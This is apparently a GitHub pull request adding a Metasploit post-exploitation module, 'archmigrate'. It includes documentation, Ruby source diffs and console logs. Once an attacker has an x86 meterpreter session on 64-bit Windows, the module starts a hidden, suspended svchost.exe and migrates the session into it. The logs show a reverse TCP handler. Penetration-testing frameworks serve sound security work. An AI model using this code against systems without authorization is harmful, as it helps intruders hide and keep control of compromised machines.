### PR TITLE
Added archmigrate module to metasploit.

### DIFF
--- a/modules/post/windows/manage/archmigrate.md
+++ b/modules/post/windows/manage/archmigrate.md
@@ -1,0 +1,73 @@
+## Creating A Testing Environment
+  To use this module you need an x86 executable type meterpreter on a x64 windows machine.
+
+This module has been tested against:
+
+  1. Windows 10.
+  2. Windows 7.
+  3. Windows Server 2008R2
+
+This module was not tested against, but may work against:
+
+  1. Other versions of Windows that are x64.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obatin a meterpreter session with an executable meterpreter via whatever method
+  3. Do: 'use post/windows/manage/archmigrate'
+  4. Do: 'set session #'
+  5. Do: 'run'
+
+## Scenarios
+
+### Windows 10 x64
+
+    msf exploit(handler) > run
+
+    [*] Started reverse TCP handler on <MSF_IP>:4567 
+    [*] Starting the payload handler...
+    [*] Sending stage (957487 bytes) to <Win10x64_IP>
+    [*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
+
+    meterpreter > sysinfo
+    Computer        : DESKTOP-SO4MCA3
+    OS              : Windows 10 (Build 14393).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+    meterpreter > background
+    [*] Backgrounding session 1...                
+    msf exploit(handler) > use post/windows/manage/archmigrate 
+    msf post(archmigrate) > set session 1
+    session => 1
+    msf post(archmigrate) > run
+
+    [*] The meterpreter is not the same architecture as the OS! Upgrading!
+    [*] Starting new x64 process C:\windows\sysnative\svchost.exe
+    [+] Got pid 1772
+    [*] Migrating..
+    [+] Success!
+    [*] Post module execution completed
+    msf post(archmigrate) > sessions -l
+
+    Active sessions
+    ===============
+
+      Id  Type                     Information                               Connection
+      --  ----                     -----------                               ----------
+      1   meterpreter x64/windows  DESKTOP-SO4MCA3\tmoose @ DESKTOP-SO4MCA3  <MSF_IP>:4567 -> <Win10x64_IP>:50917 (<Win10x64_IP>)
+
+    msf post(archmigrate) > sessions -i 1
+    [*] Starting interaction with 1...
+
+    meterpreter > sysinfo
+    Computer        : DESKTOP-SO4MCA3
+    OS              : Windows 10 (Build 14393).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x64/windows

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -5,77 +5,81 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Common
 
-    def initialize(info={})
-        super(update_info(info,
-          'Name'          => 'Architecture Migrate',
-          'Description'   => %q{This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process.},
-          'License'       => MSF_LICENSE,
-          'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
-          'References'    => [''],
-          'Platform'      => [ 'win' ],
-          'Arch'          => [ 'x86', 'x64' ],
-          'SessionTypes'  => [ 'meterpreter' ]
-        ))
+  def initialize(info={})
+    super(update_info(info,
+      'Name'      => 'Architecture Migrate',
+      'Description'   => %q{This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process.},
+      'License'     => MSF_LICENSE,
+      'Author'    => ['Koen Riepe (koen.riepe@fox-it.com)'],
+      'References'  => [''],
+      'Platform'    => [ 'win' ],
+      'Arch'      => [ 'x86', 'x64' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
 
-    register_options(
-    [
-      OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
-      OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
-    ], self.class)
+  register_options(
+  [
+    OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
+    OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
+  ], self.class)
+  end
+
+  def is_32_bit_on_64_bits
+    begin
+      apicall = session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"]
+      if apicall == "\x00\x00\x00\x00"
+        migrate = false
+      else
+        migrate = true
+      end
+      return migrate
+    rescue
+      print_error('Railgun not available, this module only works for binary meterpreters.')
     end
+  end
 
-    def is_32_bit_on_64_bits()
-        apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
-        if apicall == "\x00\x00\x00\x00"
-            migrate = false
+  def get_windows_loc
+    apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir", 255, 255)["lpBuffer"]
+    windir = apicall.split(":")[0]
+    return windir
+  end
+
+  def run
+    if is_32_bit_on_64_bits
+      print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
+      newproc = datastore['EXE']
+      if exist?(newproc)
+        print_status("Starting new x64 process #{newproc}")
+        pid = session.sys.process.execute(newproc, nil, {'Hidden' => true, 'Suspended' => true}).pid
+        print_good("Got pid #{pid}")
+        print_status('Migrating..')
+        session.core.migrate(pid)
+        if pid == session.sys.process.getpid
+          print_good('Success!')
         else
-            migrate = true
+          print_error('Migration failed!')
         end
-        return migrate
-    end
-
-    def get_windows_loc()
-        apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
-        windir = apicall.split(":")[0]
-        return windir
-    end
-
-    def run
-        if is_32_bit_on_64_bits()
-            print_status("The meterpreter is not the same architecture as the OS! Upgrading!")
-            newproc = datastore['EXE']
-            if exist?(newproc)
-                print_status("Starting new x64 process #{newproc}")
-                pid = session.sys.process.execute(newproc,nil,{'Hidden' => true,'Suspended' => true}).pid
-                print_good("Got pid #{pid}")
-                print_status("Migrating..")
-                session.core.migrate(pid)
-                if pid == session.sys.process.getpid
-                    print_good("Success!")
-                else
-                    print_error("Migration failed!")
-                end
+      else
+        print_error('The selected executable to migrate into does not exist')
+        if datastore['FALLBACK']
+          windir = get_windows_loc
+          newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"
+          if exist?(newproc)
+            print_status("Starting new x64 process #{newproc}")
+            pid = session.sys.process.execute(newproc, nil, {'Hidden' => true, 'Suspended' => true}).pid
+            print_good("Got pid #{pid}")
+            print_status('Migrating..')
+            session.core.migrate(pid)
+            if pid == session.sys.process.getpid
+              print_good('Success!')
             else
-                print_error("The selected executable to migrate into does not exist")
-                if datastore['FALLBACK']
-                    windir = get_windows_loc()
-                    newproc = windir + ':\windows\sysnative\svchost.exe'
-                    if exist?(newproc)
-                        print_status("Starting new x64 process #{newproc}")
-                        pid = session.sys.process.execute(newproc,nil,{'Hidden' => true,'Suspended' => true}).pid
-                        print_good("Got pid #{pid}")
-                        print_status("Migrating..")
-                        session.core.migrate(pid)
-                        if pid == session.sys.process.getpid
-                            print_good("Success!")
-                        else
-                            print_error("Migration failed!")
-                        end
-                    end
-                end
+              print_error('Migration failed!')
             end
-        else
-            print_good("The meterpreter is the same architecture as the OS!")
+          end
         end
+      end
+    else
+      print_good('The meterpreter is the same architecture as the OS!')
     end
+  end
 end

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -1,0 +1,58 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Post::Common
+
+    def initialize(info={})
+        super(update_info(info,
+          'Name'          => 'Architicture Migrate',
+          'Description'   => %q{This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process.},
+          'License'       => MSF_LICENSE,
+          'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
+          'References'    => [''],
+          'Platform'      => [ 'win' ],
+          'Arch'          => [ 'x86', 'x64' ],
+          'SessionTypes'  => [ 'meterpreter' ]
+        ))
+    end
+
+    def is_32_bit_on_64_bits()
+        apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
+        if apicall == "\x00\x00\x00\x00"
+            migrate = false
+        else
+            migrate = true
+        end
+        return migrate
+    end
+
+    def get_windows_loc()
+        apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
+        windir = apicall.split(":")[0]
+        return windir
+    end
+
+    def run
+        if is_32_bit_on_64_bits()
+            print_error("The meterpreter is not the same architecture as the OS! Upgrading!")
+            windir = get_windows_loc()
+            newproc = windir + ':\windows\sysnative\svchost.exe'
+            if exist?(newproc)
+                print_status("Starting new x64 process #{newproc}")
+                pid = session.sys.process.execute(newproc,nil,{'Hidden' => true,'Suspended' => true}).pid
+                print_good("Got pid #{pid}")
+                print_status("Migrating..")
+                session.core.migrate(pid)
+                if pid == session.sys.process.getpid
+                    print_good("Success!")
+                else
+                    print_error("Migration failed!")
+                end
+            end
+        else
+            print_good("The meterpreter is the same architecture as the OS!")
+        end
+    end
+end


### PR DESCRIPTION
Archmigrate is a module that safely and automatically creates a process matching the OS architecture if it detects a x86 meterpreter running on a x64 machine. It then migrates to the newly created process.

## Verification

List the steps needed to make sure this thing works

- [x] Have an existing meterpreter session
- [x] use post/windows/manage/archmigrate
- [x] set session x
- [x] run
```
Meterpreter architecture: x86
OS architecture: x86_64
The meterpreter is not the same architecture as the OS! Upgrading!
Starting new x64 process c:\windows\sysnative\svchost.exe
Got pid 836
Migrating..
Success!
Post module execution completed
```